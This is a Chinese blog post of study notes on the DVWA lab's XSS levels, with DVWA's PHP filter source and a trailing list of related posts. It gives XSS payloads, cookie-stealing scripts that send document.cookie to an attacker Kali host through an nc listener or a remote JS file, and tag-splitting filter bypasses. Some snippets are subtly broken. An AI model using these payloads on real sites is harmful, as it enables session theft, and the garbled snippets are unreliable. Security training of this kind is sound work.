dvwa之xss

最新推荐文章于 2024-04-27 17:47:40 发布
最新推荐文章于 2024-04-27 17:47:40 发布
阅读量197 收藏 2
点赞数 2
分类专栏: web安全学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45670595/article/details/114479330
版权

dvwa

xss

reflected

low

 #src地址错误,然后执行onerror的内容
<img src=http://192.168.10.128/a.jpg οnerrοr=alert('xss4')> 

<body οnlοad=alert('xss2')>
  • 重定向语句
<script>window.location='http://www.163.com'</script>
  • 获取cookie
<script>alert(document.cookie)</script>
  • kali开启监听
root@kali: ~# nc -nvlp 80

dvwa中输入:

<script>new Image().src="http://kali的ip/a.php?output="+document.cookie;</script>

可以在kali主机上获得dvwa的cookie信息

  • 加载远程的js脚本
  1. 远端服务器制作一个js脚本
root@kali:~# vim getcookie.js
root@kali:~# cat getcookie.js
var img =new Image();
img src = 'http://kali的ip:8888/cookie='+document.cookie;
root@kali:~#
  1. 搭建站点,把js脚本放到站点中,开启web服务
/etc/init.d/apache2  start
  1. 在kali主机上开启监听
root@kali: ~# nc -nvlp 80
  1. dvwa中输入
<script src="http://kali的ip/getcookie.js'output="></script>
  • medium

黑名单:

$name = str_replace( '<script>', '', $_GET[ 'name']);
  1. 大小写
  2. 组合过滤条件
<scr<script>ipt>alert('sss')</script>
<sc<script>ript>alert(/xss/)</script>
  • high
<?php 
// Is there any input? 
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { 
    // Get input 
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] ); 
    // Feedback for end user 
    echo "<pre>Hello ${name}</pre>"; 
} 
?>

同样使用黑名单过滤输入,preg_replace() 函数用于正则表达式的搜索和替换,这使得双写绕过、大小写混淆绕过(正则表达式中i表示不区分大小写)不再有效.

  • impossible

Impossible级别的代码使用htmlspecialchars函数把预定义的字符&、”、 ’、<、>转换为 HTML 实体,防止浏览器将其作为HTML元素。

stroed

将用户输入的数据存储在服务器端,每次用户访问都会被执行js脚本。

  • low

源码

 <?php

if(isset($_POST['btnSign']))
{

   $message = trim($_POST['mtxMessage']);  
   $name    = trim($_POST['txtName']);
   /*函数移除字符串两侧的空白字符或其他预定义字符,预定义字符包括、\t、\n、\x0B、\r以及空格,可选参数charlist支持添加额外需要删除的字符。*/
    
   // Sanitize message input
   $message = stripslashes($message); //删除字符串中的反斜杠。
   $message = mysql_real_escape_string($message);
    //对字符串中的特殊符号(\x00,\n,\r,\,',",\x1a)进行转义
   
   // Sanitize name input
   $name = mysql_real_escape_string($name);
  
   $query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";
   
   $result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' );
   
}
?>

name一栏前端有字数限制,可抓包进行修改

  • medium
<?php 
if( isset( $_POST[ 'btnSign' ] ) ) { 
    // Get input 
    $message = trim( $_POST[ 'mtxMessage' ] ); 
    $name    = trim( $_POST[ 'txtName' ] ); 
    // Sanitize message input 
    $message = strip_tags( addslashes( $message ) ); 
    //strip_tags()剥去字符串中的 HTML、XML 以及 PHP 的标签,但允许使用<b>标签
   
    $message = mysql_real_escape_string( $message ); 
    $message = htmlspecialchars( $message ); 
   
    // Sanitize name input 
    $name = str_replace( '<script>', '', $name ); 
    $name = mysql_real_escape_string( $name ); 
    // Update database 
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );"; 
    $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' ); 
    //mysql_close(); 
} 
?>

name入手

如果htmlspecialchars函数使用不当,攻击者就可以通过编码的方式绕过函数进行XSS注入,尤其是DOM型的XSS。

结合crsf

瓜皮鸭
关注
专栏目录
DVWAXSS (完整版)
一期一会的博客
03-30 5290
xss DOM型xss
DVWAXSS
qq_39670065的博客
08-08 368
Reflected Cross Site Scripting (XSS) low 直接尝试<script>alert('xss')</script> 弹窗成功 medium 还是先尝试<script>alert('xss')</script> 发现并没有弹窗但页面显示了Hello alert('xss') 猜测是<script>被删除 看波源码 <?php header ("X-XSS-Protection: 0"); // Is th
DVWA-XSS
qq_58091216的博客
04-19 5620
一.DOM型xss 1.low (1)我们知道最基础的xss攻击就是<script>alert(/xss/)</script> (2)我们看到english直接按select,可以看到?default=English,我们知道在?default后面进行xss攻击 (3)我们直接输入<script>alert(/xss/)</script>,可以看到弹窗 (4)因为low比较简单所以我把分析源代码放在了最后。可以看到没有如何防御 2.m.
dvwa———xss(全)
GZY0601的博客
09-28 2379
这个章节我们来讲一下xss攻击XSS 又称CSS(Cross Site Scripting)或跨站脚本攻击,攻击者在网页插入由JavaScript编写的恶意代码,当用户浏览被嵌入恶意代码的网页时,恶意代码将会在用户的浏览器上执行。xss有三种:反射型(Reflected),存储型(Stored)和DOM型反射型xss:只是简单地把用户输入的数据反射给浏览器,简单来说,黑客往往需要用户诱使用户点击一个恶意链接,才能攻击成功。(经后端,不经数据库)存储型XSS:将用户输入的数据存储在服务器端。
dvwaxss(跨站脚本)攻击
无痕的博客
01-17 2256
xss攻击介绍与在dvwaxss攻击演示
DVWA------XSS(全)
m0_65712192的博客
12-13 5323
DVWA-----XSS(全)
DVWA XSS
部分学习记录
09-19 229
DOM Based Cross Site Scripting (XSS) low 打开是一个菜单选项,提交以后发现URL有参数,修改一下呢?成功了,那直接试一下xss脚本<script>alert(document.cookie);</script>,成功获取到cookie medium 构造代码<script>alert(document.cookie)</script>,没效果?应该是有过滤机制,试一下双写,还是不行,会不会是转义问题?直接利用URL编码
网络安全-靶机dvwaXSS注入Low到High详解(含代码分析)_dvwa xss注入
最新发布
2401_84300255的博客
04-27 779
正常可以看到是Get型。
玩转DVWAXSS DOM
key01362000的博客
09-29 1074
DVWAXSS DOM攻击
dvwaxss(反射型)
Alonegrief的博客
12-01 867
Xss漏洞原理: Xss又叫跨站脚本攻击。他指的是恶意攻击者往web页面插入恶意html代码,当用户浏览该页面之时,嵌入其web的html代码会被执行,从而达到恶意的特殊目的 反射型的XSS跨站,不是长期可以加载恶意代码的,并不留存于网站代码,这种攻击是需要诱导客户去点击特定的URL地址才能触发。 例子: Xss反射型: 打开dvwa,安全级别调为low 发现这里有个输入框,尝试的输入点什么进去 发现会直接返回“Hello xxx” 测试xss可以直接在有输入框的位置插入代码 发现直接执行弹窗,1
DVWA--XSS详解
洋洋的小黑屋
12-29 8650
DVWAXSS详解 XSS概念:通常指黑客通过HTML注入纂改了网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。 XSS三种: 反射型xss:只是简单地把用户输入的数据反射给浏览器,简单来说,黑客往往需要用户诱使用户点击一个恶意链接,才能攻击成功。 存储型XSS:将用户输入的数据存储在服务器端。用户访问了带有xss得页面代码后,产生安全问题。 DOM XSS:通过修改页面的D...
dvwaXSS
qq_17762247的博客
06-14 349
一、 XSS简介 XSS(Cross site scripting,跨站脚本攻击),XSS的重点不在于跨站点,而在于脚本的执行,其原理是:攻击者在web页面插入一些恶意的script代码,当用户浏览该页面时,嵌入到页面的scripte代码执行,达到攻击用户的目的。XSS攻击主要分为几类:反射型、存储型和DOM-based型,其反射型和DOM-based型归类为非持久性攻击,存储型为持久性攻击。 二、反射型 XSS 原理:攻击者通过特定的方式诱惑用户访问一个包含恶意代码的url,用户点击该url后,恶意
DVWA学习之XSS
千寻的博客
01-02 496
DVWA学习之XSS 反射性XSS Low等级 【】 Medium等级 双写绕过: 【<scr 大小写绕过 【】 High等级 【] []当点击键盘任意一个按键的时候触发。 Impossible等级 存储型XSS Low等级 trim(string,charlist) 函数移除字符串两侧的空白字符或其他预定义字符,预定义字符包括、\t、\n、\x0B、\r以及空格,可选参...
DVWA-xss
Darklord.W
04-09 311
低等级: <script>alert('XSS')</script> <a href='' οnclick=alert('xxx')>点击</a> 重定向 <script>window.location="http://www.baidu.com"</script> 获取cookie级...
DVWAxss
giun的博客
03-11 1001
一、反射(reflected)型 (一)、尝试low等级 输入正常数字,返回以下内容 再输入&amp;lt;xss&amp;gt;发现,只输出了hello 我们使用火狐的开发者工具查看下元素 发现hello的后面是一对xss标签 我们进行弹窗测试 输入&amp;lt;script&amp;gt;alert(/xss/)&amp;lt;/script&amp;gt; 发现弹窗,说明存在xss注入 介绍javaScript的3个弹
DVWA XSS(DOM树)
qq_43452198的博客
04-23 527
XSS DOMlowmediumhighimpossible XSS(Cross Site Script),全称跨站脚本攻击,为了与 CSS(Cascading Style Sheet) 有所区别,所以在安全领域称为 XSSXSS 攻击,通常指黑客通过 HTML 注入 篡改网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击行为。 DOM型的XSS由于其特殊性,常常被分为第三种,这...
DVWA [XSS]
weixin_45253622的博客
05-17 518
目录 反射型XSS LOW Medium High Impossible 存储型XSS LOW Medium High Impossible DOM型XSS LOW Medium High Impossible 防御方式 反射型XSS LOW 源码如下: <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) &a.
DVWA --XSS
weixin_51075988的博客
01-28 265
DVWA --XSS 文章目录DVWA --XSSXSS (Reflected)LowMediumHighImpossibleXSS (Stored)LowMediumHighImpossibleXSS (DOM)LowMediumHighImpossible函数总结 XSS (Reflected) Low 反射型XSS 搜索框–输入什么返回到页面什么 查看源码 没有过滤,直接在 搜索框 当输入payload <script>alert(/xss/)</script> Med
dvwa靶场xss攻击
09-25
DVWA靶场,有一个特定的漏洞被称为XSS(跨站脚本攻击)。XSS攻击是一种利用网页应用程序对用户输入的处理不当而进行的攻击。通过在受害者浏览器执行恶意脚本,攻击者可以窃取用户的敏感信息、劫持用户会话或者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值